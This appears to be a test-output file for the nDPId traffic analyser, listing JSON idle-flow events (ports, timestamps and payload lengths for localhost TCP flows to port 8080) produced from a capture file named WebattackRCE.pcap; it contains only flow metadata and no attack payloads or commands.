-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277317,"flow_last_seen":1576420277317,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50360,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277319,"flow_last_seen":1576420277319,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50362,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277321,"flow_last_seen":1576420277321,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50364,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277322,"flow_last_seen":1576420277322,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50366,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
